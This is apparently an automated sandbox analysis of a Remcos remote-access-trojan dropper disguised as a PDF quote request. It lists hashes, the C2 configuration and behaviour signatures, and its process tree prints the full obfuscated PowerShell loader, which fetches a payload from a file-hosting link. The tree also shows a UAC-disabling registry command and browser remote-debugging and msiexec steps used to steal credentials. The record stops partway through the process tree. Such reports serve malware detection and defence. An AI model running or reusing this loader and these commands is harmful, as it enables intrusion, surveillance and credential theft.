Analysis

  • max time kernel
    148s
  • max time network
    162s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
  • submitted
    18-11-2024 09:08

General

  • Target

    Fluor RFQ1475·pdf.vbs

  • Size

    15KB

  • MD5

    695ec6cd0d4d8abaab5bed4e4f37153d

  • SHA1

    027b2b36b69e9f41bc5b54493533d8b417192255

  • SHA256

    3bb02f08d2d70b6f126d045a385a241330dbe96689304c48f1b9a1958297a060

  • SHA512

    36a68f1693a03903990cf86eafe285cacab31b8b89a2a7c033e06545942604d8c735f4ff4d15d33c77e83379d74064954cd12a5fcb1bc3ea2b6cc289ef63ae1c

  • SSDEEP

    384:aCTCJn/NHU8wde1pmZaKHQtL1YNBcYK7CB7qdgcKU:JuJnFH/w6pmmtl5WB7qm8

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

mtt9kw1mj.duckdns.org:23458

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-28YJO8

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is closed-source remote control and surveillance software.

  • Remcos family
  • UAC bypass 3 TTPs 1 IoCs
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 13 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used to control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fluor RFQ1475·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1268
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Estivate Electrochronographic Kldet denationaliseringernes Decanting Sstridskrfters #><#Hundjvel Ubeslutsomstes Skvhovedet Sammenligningerne Indstuderingens #>$Bebyrdelsen='Undervisningsbruget';function Koffardifart($Enqueter100){If ($host.DebuggerEnabled) {$Rhamnal=4} for ($Fichu=$Rhamnal;;$Fichu+=5){if(!$Enqueter100[$Fichu]) { break }$Chaetosomatidae+=$Enqueter100[$Fichu]}$Chaetosomatidae}function Poppied($Platanista147){ .($hjertesorg) ($Platanista147)}$Elskoven=Koffardifart 'Thaun FeoE ,ertD la.UnleWRoboEJenfB.alecBe al GecINskeE ilfnKa at';$Ndtvungne=Koffardifart ' BorMFriso .ekzUd,aiK.ntlNonplmacra Tan/';$firemandswhistens=Koffardifart 'Sca TMyxolJossssu p1Gal 2';$frugtstand='Tera[ PilnBraneRe eT ver.VrinSF,adEInfoRUnmevInc.iOpslcUnaceB,rtp dgao ufiI KjeNPosttSa tmbylda Unvn,deiAPlatGTeleeD cyrCrts]Fejd:Hyme: barS Be EDownCmonsuMonyr Seei scaTAll yKrydpChooRDomiosvvetSka OTydeCPurpoForbLCant=Perf$ BarfIpabI droRvarieOxheMFa.raFrkhN ystdspigSErotwSkulHUnboISeeaSMolrT eucEpaafN tr.s';$Ndtvungne+=Koffardifart 'Poe,5genn.Data0Imp Uncl(UdklWAppriE hvnFrp dGearo pirwOxalsVulk sl.tNFishTMa n Trop1Kim 0S ud.Teos0over;.onp KoreWRepoiFeo nAngl6Pavi4sche; re. No oxSylt6Rvrd4 G.r; and G derTermv la:Mund1 Mar3A ri1Forb.unco0,ret)Trgh BedsGOpvie LemcMiddkDa aoFacs/,jov2Gosc0Reas1Hamp0,sym0Sk b1 Act0Subs1 Ich I faFA riiNon rSucce R sfSquuo A hxU.vo/Mass1m,ch3R.bb1Free. 
Tar0';$Oligoprothetic=Koffardifart 'RameU Jo s LifECom RThil- Wala ortgPrineMa.tnmumbt';$Valsede=Koffardifart 'Mangh afrtFl atAktip PedsLin :Mcen/Katu/Pl nd msarJuleiThe,vCirceBur .AmangIrraoUnd oP.otgenerlSkifeFord.MetacDiffo esmKamm/Folku.irtcCru ?App e.krmxKiddpUn,eo m nrAfbitProa= tatd TwioCorpwHortn RumlN rvoFaldaEk odRis &Eye iRevadUdry= .yg1E brgmonsxProb2 He EAssuzH mm0Valgd AnaXKar.C irc3H ndz f rOP.ee3Pels4Clem2Sm t-BlyaR Un x BrakSkinEAitsc al4Gol,d Do,-EcocMOverHDdssYSeptA.schkReim-TrespErhvE';$tttekammen=Koffardifart 'Hibe>';$hjertesorg=Koffardifart 'OveriNat,e Immx';$Redirigeringers='Risskov';$Tilbagekaldelsesordningen='\Houting.Gha';Poppied (Koffardifart ' id$Be tg P.pLS,bsoKor.bBlaaATenelProd: .nfS,anct,oolORettFDegeMsoapN RenGForeDSpeceFastsComm=R ta$NarceSaddNPrisVfrdi:E,hia Pr P TycPEskoD PatAReditKursAVan,+ Aha$ sk tSk biSu sl SkrbApana mrG naeDa.sk uraFi sLLaveDNeurECanclSkotS ondEBa dSPar OdeteRVegeDAcann ModI.aminHalfg TaoeNo mN');Poppied (Koffardifart ' sse$AlpeG Sk LLnenOAn mBOposa HonLLn t:PencodefiVSammeG,eaRSupebAyelYErhvGT mbnU exI utNForbGUlve=Obse$wareV Fl a enlEnr S epELuxedCon ERef..TelesGeompMozalUncoiSpejtFetu( Nar$Teo,t weat xtTBij eIdeak Sa aUns MMetoMSte ESkrinSttt)');Poppied (Koffardifart $frugtstand);$Valsede=$overbygning[0];$Brontosaur=(Koffardifart ' Lod$Skr g PolL ungODisaBPhota,joeLKlu :.vanBSte ROverE SunM Ko e feslT rpYSad =MellNZoneeGr.lWTilb-Ko tOFr lbmaskJHypoeNarccPattt Bag nseSbuchy,ubpsKazaTSemiE,cytMUnsp.E bl$StoreLay,lSydsSMar.K OutoPsalVbi.eet.lgn');Poppied ($Brontosaur);Poppied (Koffardifart 'Nive$KrypBRep,r cateTilsmDealeU velAlkyySt m.St,rHPrede O ea entdClaueBootrhac.s Dis[Ro,a$FrisOsa tl freiJe ngD,lioSpndp unerEndaoStettEr.ch S aeCu etWieni OricStal]Unde=Occi$receN rnd memtBeslvT avuS ojnlabig DamnForee');$Rubiginose=Koffardifart 'Triv$Ka mBPa er PaneKommm GrueI del ,ney eur.StraDAlkaoFremwH.linSi pl tao Bygaud,bd derFNontiUautlHaggeSste(Opve$BoolVVildaF sslEnnosP ile,ogodLogae Un.,Af.a$FuliAMahdmDalep 
CarhN.rdi .hig .quaProfm Disa StreOpa )';$Amphigamae=$Stofmngdes;Poppied (Koffardifart ' Sta$Sun gC deLsounOpauebOsteaKaftL Tan:s,yrbPrveuGamiTPhenIMaskkBezaSUbefSAmniT MonrGe tUVenikRecuTPlanUSpinRNo.b=Indl(Abnot ette ResSWl dt Kat- ConPBakkaLayeTTam HOps Rddi$ ArtAkonomH reP SkuH rdeIA,tigSupeAazalMHoglAGauceTrkk)');while (!$Butiksstruktur) {Poppied (Koffardifart 'Kall$ izzgt wblIndsoBi dbIndta DomlDobb:SlumS,mtalbackaOpstgFutut SpeeNivekMetrvAcutgUnca=G,ft$PleaMBefoyArguoPapinUncueMakauBasers mioDisomPalaa') ;Poppied $Rubiginose;Poppied (Koffardifart 'Trsts,kdetBayoASludr PartOutw-DiffsTot L BaleHemoe,krip B o Stor4');Poppied (Koffardifart ' Ind$ KobGDennLdesuocompBShoca Krol Un.:T rrbTreauTricT G.nIAer k ,yoSM lisDe at palrCrosuBaankunlotDisrUGarvr Tr =Slip( PretOvereAmniSas etSkri-U biPMenuaEkspTSerbHur t Aut$ AkkANomeMGuttpRetuhAdamiCompgvatiA mpaMAteiaEtouEAneu)') ;Poppied (Koffardifart 'Nemo$OvergKautLStroO LanB enta eziL Cha:G spSIndePRanuIarveRReariVisstRefoe Ki d UdflfljtyRask=Quat$AuragEquiLO riO LvsbBesyA cholPest:Ta gP SelIF emLH,rmT Para Na SSloyTTakte ukaRUndeS Ech+Afid+ Thu%Lok $SammO revOficEAislRSculBOmvey ForG RhaNA.toIUnocNHorsgse,v.AumeC Hi oAnt U asyNLe pT') ;$Valsede=$overbygning[$Spiritedly]}$Adventistens=301189;$Abetment=30028;Poppied (Koffardifart 'Omba$ Klag BruL fesobumbB Hyracar.L N n:Arr KSalvnFlytkByggBpresRAutod Ta eMollN.kolE Kr ept=Ekst Sli,GHel.E nteTToym-In,ocHemooK rlnConst irceVveiN omaTSur dea$Aft AIndlMHn ePfrimh mbriBotoG Co.A DaaMFly aPeasE');Poppied (Koffardifart 'Rr r$DogsgCy.llKr eoBranbPa.ma anlStap:MaryH UbeoemblfRandjFemog irae .aarBrndmKanaeTillsBatttExcerNedneEnvinAkseeBe a Foo= tje For[,sonSOlanyLudbs rictH skeg ycm For.PeebCBeslo S mnMatevR,toe SkurTegnt,ene] lar:Hjer: GniFReforAggeoDivimO,hrBBillaDe esTo veSila6Scle4FestSkejst linrI,pei IntnMu tgSt l( Unr$SwigKKrosnNo.skCatabR skr WhidTe re DivnRivee Gen)');Poppied (Koffardifart 'Tec $tolvgEnjelUpdroIntubWeatAS lll Un,: SabeFriglPr dV KeraEnnuN DagiWheet 
RreIPresCEven Eme=Orib Micr[ entSSav YdjvlSGregTFuldeThe MAgno.Te et LaneProcXCigaT Ph .Tetae MisnNsebCMe aofor DAnt.IskrmNRumfGNon ]Reng: Bam:.nphAP.roS Fa cAfteidiphi Sik. GolgPrene fr TRadiS ermTBdeprElitIKomfnSaksGBer ( us$Opp.h onsoRoguFBetwJS,orGBundeAfteRSl gm CuleKlipsbillT,terr SkaEBluenforme t i)');Poppied (Koffardifart 'B id$Va.aG BegLStilOPropB,uria DanLMagi:Lo sz illYstorgAfgaOUdfrdOejeaMortcSwirtunamY FleLTubii Res=U se$,rade arelUndev.redaHas.NFolkIEuorT kroiSpikCKvar.Pr.aSGeleu tomb ofeS ,poTJonsr ulI H pn yldGRo,b(Cyma$Mae ASandd,usaVgushEMellN aaht Enci TokS peT,oleE yggn Su s Bed,koda$ ,umAUnwhbcente Bilt .nbmAmirEDiskNSym THasp)');Poppied $zygodactyli;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1048
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Estivate Electrochronographic Kldet denationaliseringernes Decanting Sstridskrfters #><#Hundjvel Ubeslutsomstes Skvhovedet Sammenligningerne Indstuderingens #>$Bebyrdelsen='Undervisningsbruget';function Koffardifart($Enqueter100){If ($host.DebuggerEnabled) {$Rhamnal=4} for ($Fichu=$Rhamnal;;$Fichu+=5){if(!$Enqueter100[$Fichu]) { break }$Chaetosomatidae+=$Enqueter100[$Fichu]}$Chaetosomatidae}function Poppied($Platanista147){ .($hjertesorg) ($Platanista147)}$Elskoven=Koffardifart 'Thaun FeoE ,ertD la.UnleWRoboEJenfB.alecBe al GecINskeE ilfnKa at';$Ndtvungne=Koffardifart ' BorMFriso .ekzUd,aiK.ntlNonplmacra Tan/';$firemandswhistens=Koffardifart 'Sca TMyxolJossssu p1Gal 2';$frugtstand='Tera[ PilnBraneRe eT ver.VrinSF,adEInfoRUnmevInc.iOpslcUnaceB,rtp dgao ufiI KjeNPosttSa tmbylda Unvn,deiAPlatGTeleeD cyrCrts]Fejd:Hyme: barS Be EDownCmonsuMonyr Seei scaTAll yKrydpChooRDomiosvvetSka OTydeCPurpoForbLCant=Perf$ BarfIpabI droRvarieOxheMFa.raFrkhN ystdspigSErotwSkulHUnboISeeaSMolrT eucEpaafN tr.s';$Ndtvungne+=Koffardifart 'Poe,5genn.Data0Imp Uncl(UdklWAppriE hvnFrp dGearo pirwOxalsVulk sl.tNFishTMa n Trop1Kim 0S ud.Teos0over;.onp KoreWRepoiFeo nAngl6Pavi4sche; re. No oxSylt6Rvrd4 G.r; and G derTermv la:Mund1 Mar3A ri1Forb.unco0,ret)Trgh BedsGOpvie LemcMiddkDa aoFacs/,jov2Gosc0Reas1Hamp0,sym0Sk b1 Act0Subs1 Ich I faFA riiNon rSucce R sfSquuo A hxU.vo/Mass1m,ch3R.bb1Free. 
Tar0';$Oligoprothetic=Koffardifart 'RameU Jo s LifECom RThil- Wala ortgPrineMa.tnmumbt';$Valsede=Koffardifart 'Mangh afrtFl atAktip PedsLin :Mcen/Katu/Pl nd msarJuleiThe,vCirceBur .AmangIrraoUnd oP.otgenerlSkifeFord.MetacDiffo esmKamm/Folku.irtcCru ?App e.krmxKiddpUn,eo m nrAfbitProa= tatd TwioCorpwHortn RumlN rvoFaldaEk odRis &Eye iRevadUdry= .yg1E brgmonsxProb2 He EAssuzH mm0Valgd AnaXKar.C irc3H ndz f rOP.ee3Pels4Clem2Sm t-BlyaR Un x BrakSkinEAitsc al4Gol,d Do,-EcocMOverHDdssYSeptA.schkReim-TrespErhvE';$tttekammen=Koffardifart 'Hibe>';$hjertesorg=Koffardifart 'OveriNat,e Immx';$Redirigeringers='Risskov';$Tilbagekaldelsesordningen='\Houting.Gha';Poppied (Koffardifart ' id$Be tg P.pLS,bsoKor.bBlaaATenelProd: .nfS,anct,oolORettFDegeMsoapN RenGForeDSpeceFastsComm=R ta$NarceSaddNPrisVfrdi:E,hia Pr P TycPEskoD PatAReditKursAVan,+ Aha$ sk tSk biSu sl SkrbApana mrG naeDa.sk uraFi sLLaveDNeurECanclSkotS ondEBa dSPar OdeteRVegeDAcann ModI.aminHalfg TaoeNo mN');Poppied (Koffardifart ' sse$AlpeG Sk LLnenOAn mBOposa HonLLn t:PencodefiVSammeG,eaRSupebAyelYErhvGT mbnU exI utNForbGUlve=Obse$wareV Fl a enlEnr S epELuxedCon ERef..TelesGeompMozalUncoiSpejtFetu( Nar$Teo,t weat xtTBij eIdeak Sa aUns MMetoMSte ESkrinSttt)');Poppied (Koffardifart $frugtstand);$Valsede=$overbygning[0];$Brontosaur=(Koffardifart ' Lod$Skr g PolL ungODisaBPhota,joeLKlu :.vanBSte ROverE SunM Ko e feslT rpYSad =MellNZoneeGr.lWTilb-Ko tOFr lbmaskJHypoeNarccPattt Bag nseSbuchy,ubpsKazaTSemiE,cytMUnsp.E bl$StoreLay,lSydsSMar.K OutoPsalVbi.eet.lgn');Poppied ($Brontosaur);Poppied (Koffardifart 'Nive$KrypBRep,r cateTilsmDealeU velAlkyySt m.St,rHPrede O ea entdClaueBootrhac.s Dis[Ro,a$FrisOsa tl freiJe ngD,lioSpndp unerEndaoStettEr.ch S aeCu etWieni OricStal]Unde=Occi$receN rnd memtBeslvT avuS ojnlabig DamnForee');$Rubiginose=Koffardifart 'Triv$Ka mBPa er PaneKommm GrueI del ,ney eur.StraDAlkaoFremwH.linSi pl tao Bygaud,bd derFNontiUautlHaggeSste(Opve$BoolVVildaF sslEnnosP ile,ogodLogae Un.,Af.a$FuliAMahdmDalep 
CarhN.rdi .hig .quaProfm Disa StreOpa )';$Amphigamae=$Stofmngdes;Poppied (Koffardifart ' Sta$Sun gC deLsounOpauebOsteaKaftL Tan:s,yrbPrveuGamiTPhenIMaskkBezaSUbefSAmniT MonrGe tUVenikRecuTPlanUSpinRNo.b=Indl(Abnot ette ResSWl dt Kat- ConPBakkaLayeTTam HOps Rddi$ ArtAkonomH reP SkuH rdeIA,tigSupeAazalMHoglAGauceTrkk)');while (!$Butiksstruktur) {Poppied (Koffardifart 'Kall$ izzgt wblIndsoBi dbIndta DomlDobb:SlumS,mtalbackaOpstgFutut SpeeNivekMetrvAcutgUnca=G,ft$PleaMBefoyArguoPapinUncueMakauBasers mioDisomPalaa') ;Poppied $Rubiginose;Poppied (Koffardifart 'Trsts,kdetBayoASludr PartOutw-DiffsTot L BaleHemoe,krip B o Stor4');Poppied (Koffardifart ' Ind$ KobGDennLdesuocompBShoca Krol Un.:T rrbTreauTricT G.nIAer k ,yoSM lisDe at palrCrosuBaankunlotDisrUGarvr Tr =Slip( PretOvereAmniSas etSkri-U biPMenuaEkspTSerbHur t Aut$ AkkANomeMGuttpRetuhAdamiCompgvatiA mpaMAteiaEtouEAneu)') ;Poppied (Koffardifart 'Nemo$OvergKautLStroO LanB enta eziL Cha:G spSIndePRanuIarveRReariVisstRefoe Ki d UdflfljtyRask=Quat$AuragEquiLO riO LvsbBesyA cholPest:Ta gP SelIF emLH,rmT Para Na SSloyTTakte ukaRUndeS Ech+Afid+ Thu%Lok $SammO revOficEAislRSculBOmvey ForG RhaNA.toIUnocNHorsgse,v.AumeC Hi oAnt U asyNLe pT') ;$Valsede=$overbygning[$Spiritedly]}$Adventistens=301189;$Abetment=30028;Poppied (Koffardifart 'Omba$ Klag BruL fesobumbB Hyracar.L N n:Arr KSalvnFlytkByggBpresRAutod Ta eMollN.kolE Kr ept=Ekst Sli,GHel.E nteTToym-In,ocHemooK rlnConst irceVveiN omaTSur dea$Aft AIndlMHn ePfrimh mbriBotoG Co.A DaaMFly aPeasE');Poppied (Koffardifart 'Rr r$DogsgCy.llKr eoBranbPa.ma anlStap:MaryH UbeoemblfRandjFemog irae .aarBrndmKanaeTillsBatttExcerNedneEnvinAkseeBe a Foo= tje For[,sonSOlanyLudbs rictH skeg ycm For.PeebCBeslo S mnMatevR,toe SkurTegnt,ene] lar:Hjer: GniFReforAggeoDivimO,hrBBillaDe esTo veSila6Scle4FestSkejst linrI,pei IntnMu tgSt l( Unr$SwigKKrosnNo.skCatabR skr WhidTe re DivnRivee Gen)');Poppied (Koffardifart 'Tec $tolvgEnjelUpdroIntubWeatAS lll Un,: SabeFriglPr dV KeraEnnuN DagiWheet 
RreIPresCEven Eme=Orib Micr[ entSSav YdjvlSGregTFuldeThe MAgno.Te et LaneProcXCigaT Ph .Tetae MisnNsebCMe aofor DAnt.IskrmNRumfGNon ]Reng: Bam:.nphAP.roS Fa cAfteidiphi Sik. GolgPrene fr TRadiS ermTBdeprElitIKomfnSaksGBer ( us$Opp.h onsoRoguFBetwJS,orGBundeAfteRSl gm CuleKlipsbillT,terr SkaEBluenforme t i)');Poppied (Koffardifart 'B id$Va.aG BegLStilOPropB,uria DanLMagi:Lo sz illYstorgAfgaOUdfrdOejeaMortcSwirtunamY FleLTubii Res=U se$,rade arelUndev.redaHas.NFolkIEuorT kroiSpikCKvar.Pr.aSGeleu tomb ofeS ,poTJonsr ulI H pn yldGRo,b(Cyma$Mae ASandd,usaVgushEMellN aaht Enci TokS peT,oleE yggn Su s Bed,koda$ ,umAUnwhbcente Bilt .nbmAmirEDiskNSym THasp)');Poppied $zygodactyli;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5040
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2620
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3696
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1172
      • C:\Program Files\Google\Chrome\Application\Chrome.exe
        --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
        3⤵
        • Uses browser remote debugging
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2380
        • C:\Program Files\Google\Chrome\Application\Chrome.exe
          "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcd483cc40,0x7ffcd483cc4c,0x7ffcd483cc58
          4⤵
          PID:2040
        • C:\Program Files\Google\Chrome\Application\Chrome.exe
          "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,1210652548765723729,2911505113347473541,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1908 /prefetch:2
          4⤵
          PID:1552
        • C:\Program Files\Google\Chrome\Application\Chrome.exe
          "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,1210652548765723729,2911505113347473541,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2212 /prefetch:3
          4⤵
          PID:3584
        • C:\Program Files\Google\Chrome\Application\Chrome.exe
          "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2224,i,1210652548765723729,2911505113347473541,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2292 /prefetch:8
          4⤵
          PID:1828
        • C:\Program Files\Google\Chrome\Application\Chrome.exe
          "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,1210652548765723729,2911505113347473541,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3188 /prefetch:1
          4⤵
          • Uses browser remote debugging
          PID:3608
        • C:\Program Files\Google\Chrome\Application\Chrome.exe
          "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,1210652548765723729,2911505113347473541,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3236 /prefetch:1
          4⤵
          • Uses browser remote debugging
          PID:4044
        • C:\Program Files\Google\Chrome\Application\Chrome.exe
          "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4600,i,1210652548765723729,2911505113347473541,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4628 /prefetch:1
          4⤵
          • Uses browser remote debugging
          PID:1032
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mdxzdrasomo"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4268
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\xfkkejkucugdha"
        3⤵
        • Accesses Microsoft Outlook accounts
        • System Location Discovery: System Language Discovery
        PID:3724
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\hzqcecvoqcyqrotekl"
        3⤵
        PID:3988
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\hzqcecvoqcyqrotekl"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:976
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
        3⤵
        • Uses browser remote debugging
        • Enumerates system info in registry
        • Modifies registry class
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        PID:3860
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffcd46f46f8,0x7ffcd46f4708,0x7ffcd46f4718
          4⤵
          PID:2228
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,5031013863036374286,9431848645175149783,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
          4⤵
          PID:4032
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,5031013863036374286,9431848645175149783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
          4⤵
          PID:1376
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,5031013863036374286,9431848645175149783,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8
          4⤵
          PID:4760
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
